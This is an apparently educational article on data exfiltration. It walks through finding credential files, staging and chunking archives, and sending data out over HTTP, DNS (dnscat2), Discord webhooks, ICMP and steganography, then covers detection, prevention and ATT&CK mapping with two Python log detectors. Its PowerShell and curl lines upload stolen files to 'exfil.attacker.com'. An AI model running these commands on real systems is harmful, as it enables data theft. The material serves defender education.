Data Exfiltration: Getting the Data Out
Exfiltration is the attacker's payday. All the access, all the credentials, all the lateral movement—it's all leading here. Getting sensitive data out of the network without detection is the final challenge.
The Exfiltration Process
EXFILTRATION STAGES:

1. COLLECTION    Find data: documents, databases, emails, code, secrets
2. STAGING       Aggregate: compress, encrypt, stage in a temp location
3. EXFILTRATION  Transfer: encrypt, chunk, send via a covert channel
4. CLEANUP       Delete artifacts: cover tracks, remove staged files, clear logs
Data Collection
First, find and identify valuable data. What's worth stealing depends on the attacker's goals: espionage, extortion, competitive advantage.
High-Value Data Targets
| Data Type | Common Locations | Value |
|---|---|---|
| Credentials | NTDS.dit, SAM, LSASS, KeePass | Access to more systems |
| Source Code | Git repos, dev servers | IP theft, vulnerability discovery |
| Customer Data | Databases, CRM systems | Ransom, sale on dark web |
| Financial Data | Accounting systems, spreadsheets | Fraud, trading advantage |
| Emails | Exchange, O365, PST files | Intel, blackmail, BEC |
| Strategic Docs | SharePoint, file shares | Competitive advantage |
Finding Sensitive Data
```powershell
# Search for interesting files
Get-ChildItem -Path C:\ -Recurse -Include *.docx,*.xlsx,*.pdf -ErrorAction SilentlyContinue

# Find files with keywords in name
Get-ChildItem -Path \\server\share -Recurse | Where-Object {
    $_.Name -match "password|secret|confidential|private|credential"
}

# Search file contents
Select-String -Path C:\Users\*\Documents\*.txt -Pattern "password"

# Find recently modified files (active projects)
Get-ChildItem -Path \\server\share -Recurse |
    Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-30) }

# Database connection strings
Select-String -Path C:\inetpub\*.config -Pattern "connectionString"
```
Data Staging
Before exfiltration, data is typically compressed and encrypted to reduce size and avoid content inspection.
```powershell
# Compress files
Compress-Archive -Path C:\StagedData\* -DestinationPath C:\Temp\data.zip

# Using 7-Zip (if available) with encryption
& 'C:\Program Files\7-Zip\7z.exe' a -pSecretPassword -mhe=on archive.7z C:\StagedData\*

# Split into chunks (evade size-based detection)
$file = [IO.File]::ReadAllBytes("C:\Temp\data.zip")
$chunkSize = 1MB
for ($i = 0; $i -lt $file.Length; $i += $chunkSize) {
    $chunk = $file[$i..([Math]::Min($i + $chunkSize - 1, $file.Length - 1))]
    [IO.File]::WriteAllBytes("C:\Temp\chunk_$($i / $chunkSize).bin", $chunk)
}
```
Staging Locations
COMMON STAGING LOCATIONS:
Temp directories:
├── C:\Windows\Temp\
├── C:\Users\Public\
├── %TEMP%
└── C:\ProgramData\
Hidden in plain sight:
├── Renamed as legitimate files (.log, .tmp)
├── ADS (Alternate Data Streams)
└── Steganography in images
Exfiltration Channels
The channel determines how data leaves the network. Each has trade-offs between speed, stealth, and reliability.
HTTP/HTTPS
The most common exfiltration channel. Blends with normal web traffic and is rarely blocked outbound.
```powershell
# PowerShell - Upload via POST
$data = Get-Content C:\Temp\data.zip -Raw -Encoding Byte
$base64 = [Convert]::ToBase64String($data)
Invoke-WebRequest -Uri "https://exfil.attacker.com/upload" -Method POST -Body $base64

# Using curl (if available)
curl -X POST -d @data.zip https://exfil.attacker.com/upload

# Via C2 beacon - data sent as task result
# Most C2 frameworks handle chunking automatically
```
DNS Exfiltration
Data encoded in DNS queries. Very slow but extremely covert—DNS is rarely blocked and often not inspected.
```shell
# Server (attacker)
ruby dnscat2.rb attacker-domain.com

# Client (victim)
dnscat2.exe attacker-domain.com

# Data encoded in subdomains:
# [base64_chunk].data.attacker-domain.com
# Each query contains ~60 bytes of data
# Slow but works through most firewalls
```
DNS EXFILTRATION METHODS:
SUBDOMAIN ENCODING:
├── Data encoded in subdomain labels
├── xyz123abc.data.attacker.com
├── ~63 chars per label, 253 total
└── Multiple queries for large files
TXT RECORD RESPONSES:
├── Server returns data in TXT records
├── Useful for bidirectional communication
├── Supports larger chunks (~255 bytes)
└── More suspicious than A record queries
TOOLS:
├── dnscat2 - Full tunnel over DNS
├── iodine - IP-over-DNS tunnel
├── DNSExfiltrator - Data exfil focused
└── Cobalt Strike DNS beacon
Cloud Services
Legitimate cloud services are excellent exfiltration channels—traffic goes to trusted domains and is often encrypted end-to-end.
CLOUD EXFILTRATION CHANNELS:
FILE STORAGE:
├── Dropbox, Google Drive, OneDrive
├── AWS S3 buckets
├── Azure Blob Storage
├── Box, Mega, etc.
└── Often already whitelisted
COMMUNICATION PLATFORMS:
├── Slack (webhook uploads)
├── Discord (webhook uploads)
├── Microsoft Teams
├── Telegram bots
└── Normal business traffic
CODE REPOSITORIES:
├── GitHub (commit file contents)
├── GitLab, Bitbucket
├── Gists (GitHub Gist API)
└── Pastebin-style services
TECHNIQUE:
├── Use API keys (free tier accounts)
├── Encrypted before upload
├── Chunked for size limits
└── Deleted after retrieval
```powershell
# Create Discord server, add webhook
# Webhook URL: https://discord.com/api/webhooks/xxx/yyy

# PowerShell exfil
$webhookUrl = "https://discord.com/api/webhooks/xxx/yyy"
$data = Get-Content C:\Temp\data.txt
$body = @{ content = $data } | ConvertTo-Json
Invoke-RestMethod -Uri $webhookUrl -Method POST -Body $body -ContentType "application/json"

# For files - use multipart form
$file = Get-Item C:\Temp\data.zip
Invoke-RestMethod -Uri $webhookUrl -Method POST -Form @{ file = $file }
```
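Uploads like the POST and webhook calls above, especially when the archive was split into fixed-size chunks first, leave a pattern in web proxy logs that a defender can alert on (T1030, Data Transfer Size Limits, in the mapping below). This is an added example, not code from the original page; the proxy log format, the sample lines, the sanctioned-host allowlist and the thresholds are all constructed assumptions.

```python
from collections import defaultdict

# Constructed proxy log (not real traffic): "<time> <client> <method> <host> <bytes_out>"
SAMPLE_LOG = """\
09:00:01 10.0.0.5 GET www.example.com 410
09:00:05 10.0.0.5 POST mail.example.com 18240
09:01:00 10.0.0.7 POST discord.com 1048576
09:01:02 10.0.0.7 POST discord.com 1048576
09:01:04 10.0.0.7 POST discord.com 1048576
09:01:06 10.0.0.7 POST discord.com 1048576
09:01:08 10.0.0.7 POST discord.com 739812
09:02:00 10.0.0.9 PUT files.example.net 2097152
"""
# Assumption: these are the organisation's sanctioned upload hosts; limits are illustrative
ALLOWED_UPLOAD_HOSTS = {"mail.example.com", "files.example.net"}
UPLOAD_METHODS = {"POST", "PUT"}
VOLUME_LIMIT = 4 * 1024 * 1024  # bytes per client/host pair before alerting
MIN_CHUNKS = 3                  # identical-sized uploads needed to call it chunking

def parse(log_text):
    # yield (client, method, host, bytes_out); malformed lines are skipped, not fatal
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[4].isdigit():
            yield parts[1], parts[2], parts[3], int(parts[4])

def chunk_pattern(sizes, min_chunks=MIN_CHUNKS):
    # fixed-size chunking (1 MB pieces plus a remainder) shows as repeated equal sizes
    counts = defaultdict(int)
    for size in sizes:
        counts[size] += 1
    return max(counts.values(), default=0) >= min_chunks

def analyze(log_text):
    uploads = defaultdict(list)  # (client, host) -> list of upload sizes
    for client, method, host, size in parse(log_text):
        if method in UPLOAD_METHODS:
            uploads[(client, host)].append(size)
    findings = []
    for (client, host), sizes in uploads.items():
        reasons = []
        if host not in ALLOWED_UPLOAD_HOSTS:
            reasons.append("unsanctioned_upload_host")
        if sum(sizes) > VOLUME_LIMIT:
            reasons.append("volume_over_limit")
        if chunk_pattern(sizes):
            reasons.append("fixed_size_chunks")
        if reasons:
            findings.append({"client": client, "host": host, "bytes": sum(sizes),
                             "uploads": len(sizes), "reasons": reasons})
    return findings
```

The three reasons are independent on purpose: a large upload to a sanctioned host is only a volume alert, while repeated equal-sized POSTs to an unlisted host trip all three.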
ICMP & Other Protocols
Data hidden in unexpected protocol fields. ICMP echo (ping) payload is rarely inspected.
COVERT CHANNEL PROTOCOLS:
ICMP:
├── Data in echo request/reply payload
├── ping -p [hex_data] on Linux
├── Slow but works through many firewalls
└── Tools: icmpsh, ptunnel
NTP:
├── Data hidden in NTP packets
├── Port 123 often allowed outbound
└── Unusual but effective
CUSTOM TCP/UDP:
├── Data encoded in headers
├── Sequence numbers
├── Timestamps
└── TCP options fields
Physical Exfiltration
Sometimes the easiest way out is physical—USB drives, smartphones, printed documents.
PHYSICAL EXFIL METHODS:
REMOVABLE MEDIA:
├── USB drives (encrypted)
├── External hard drives
├── SD cards (very concealable)
└── CDs/DVDs (outdated but available)
MOBILE DEVICES:
├── Photo/screenshot of screens
├── Tethered phone as network bridge
├── USB data transfer
└── Bluetooth exfil
PRINTED MATERIAL:
├── QR codes on paper (data encoded)
├── Printouts of sensitive documents
├── Screenshots printed
└── Hard to detect digitally
AUDIO/VISUAL:
├── Screen recording
├── Camera capturing screens
├── Ultrasonic data transmission
└── Air-gap jumping techniques
Steganography
Data hidden within innocent-looking files—images, audio, video. The carrier file appears completely normal.
```shell
# Hide data in image
steghide embed -cf innocent.jpg -ef secret.txt -p password

# Extract hidden data
steghide extract -sf innocent.jpg -p password

# Image looks completely normal
# Can be uploaded to social media, cloud storage, etc.
# Retrieval: download image, extract data
```
Detection & Defense
Data exfiltration is the attacker's goal. Strong DLP and network monitoring are critical for detection.
EXFILTRATION DETECTION:
NETWORK MONITORING:
├── Unusual outbound data volumes
├── Connections to rare destinations
├── Off-hours network activity
├── Protocol anomalies (DNS tunneling)
├── Large uploads to cloud services
└── Encrypted traffic to unknown hosts
DLP (Data Loss Prevention):
├── Content inspection (PII, source code)
├── Endpoint DLP agents
├── Email attachment scanning
├── Cloud app monitoring (CASB)
└── USB device control
BEHAVIORAL ANALYSIS:
├── User accessing unusual file shares
├── Mass file downloads
├── Compression/encryption of many files
├── Staging behavior (files in temp)
└── After-hours data access
DNS SPECIFIC:
├── High volume DNS queries
├── TXT record queries to unusual domains
├── Long subdomain strings
├── Queries to newly registered domains
└── DNS-over-HTTPS (DoH) detection
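The subdomain encoding described under DNS Exfiltration (~63 characters per label, many queries per file, TXT lookups for the return path) is exactly what the DNS SPECIFIC checks above key on, and the two can be combined into a small detector over resolver logs. This is an added example, not code from the original page; the log format, the constructed sample queries, the thresholds and the "last two labels are the registered domain" shortcut are assumptions.

```python
import math
from collections import Counter, defaultdict
# Constructed sample DNS log (not real traffic): "<time> <client> <qtype> <qname>"
SAMPLE_LOG = """\
10:00:01 10.0.0.5 A www.example.com
10:00:02 10.0.0.5 A cdn.example.net
10:00:03 10.0.0.7 A aGVsbG8gd29ybGQgdGhpcyBpcyBzZWNyZXQgZGF0YQ.data.attacker-domain.com
10:00:03 10.0.0.7 A dGhpcyBpcyBtb3JlIGNvbmZpZGVudGlhbCBkYXRhIGhlcmU.data.attacker-domain.com
10:00:04 10.0.0.7 TXT c2VjcmV0cyBhbmQgcGFzc3dvcmRzIGV4ZmlsdHJhdGVk.data.attacker-domain.com
10:00:04 10.0.0.7 A YW5vdGhlciBjaHVuayBvZiBzZW5zaXRpdmUgYnl0ZXM.data.attacker-domain.com
"""
MAX_LABEL_LEN = 30   # human-chosen hostnames rarely exceed this; encoded chunks do
MIN_ENTROPY = 3.5    # bits/char; encoded payload labels score higher than dictionary words
MIN_QUERIES = 3      # alert on a client/domain pair only after this many suspicious hits

def shannon_entropy(s):
    # bits of entropy per character; 0.0 for the empty string
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def registered_domain(qname):
    # assumption: the last two labels are the registered domain (no public-suffix list here)
    return ".".join(qname.rstrip(".").split(".")[-2:])

def query_reasons(qtype, qname):
    # heuristics a single query trips; an empty list means it looks normal
    first = qname.split(".")[0]
    reasons = []
    if len(first) > MAX_LABEL_LEN:
        reasons.append("long_label")
    if shannon_entropy(first) > MIN_ENTROPY:
        reasons.append("high_entropy_label")
    if qtype.upper() == "TXT":
        reasons.append("txt_query")
    return reasons

def analyze(log_text, min_queries=MIN_QUERIES):
    # group suspicious queries by (client, domain) and report pairs over the threshold
    buckets = defaultdict(lambda: {"queries": 0, "reasons": set()})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than crash on them
        _, client, qtype, qname = parts
        reasons = query_reasons(qtype, qname)
        if reasons:
            b = buckets[(client, registered_domain(qname))]
            b["queries"] += 1
            b["reasons"].update(reasons)
    return [{"client": c, "domain": d, **v} for (c, d), v in buckets.items() if v["queries"] >= min_queries]
```

Counting per client/domain pair rather than per query is what keeps a single odd-looking CDN hostname from paging anyone; tune the thresholds against your own resolver baseline before enabling alerts.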
EXFILTRATION PREVENTION:
EGRESS CONTROLS:
├── Whitelist outbound destinations
├── Block direct internet access (proxy required)
├── SSL/TLS inspection
├── Block DNS over HTTPS (DoH)
└── Rate limit outbound connections
ENDPOINT CONTROLS:
├── USB device restrictions
├── Application whitelisting
├── Disable cloud sync clients
├── Screen capture restrictions
└── Clipboard monitoring
DATA CONTROLS:
├── Data classification (know what's sensitive)
├── Encrypt sensitive data at rest
├── Rights management (IRM/DRM)
├── Watermarking for tracking
└── Access logging and alerting
MITRE ATT&CK Mapping
| Technique | Name | Description |
|---|---|---|
| T1041 | Exfiltration Over C2 Channel | Data sent via existing C2 |
| T1048 | Exfiltration Over Alternative Protocol | DNS, ICMP, etc. |
| T1567 | Exfiltration Over Web Service | Cloud storage, code repos |
| T1052 | Exfiltration Over Physical Medium | USB, mobile devices |
| T1030 | Data Transfer Size Limits | Chunked exfiltration |
| T1029 | Scheduled Transfer | Timed exfil to avoid detection |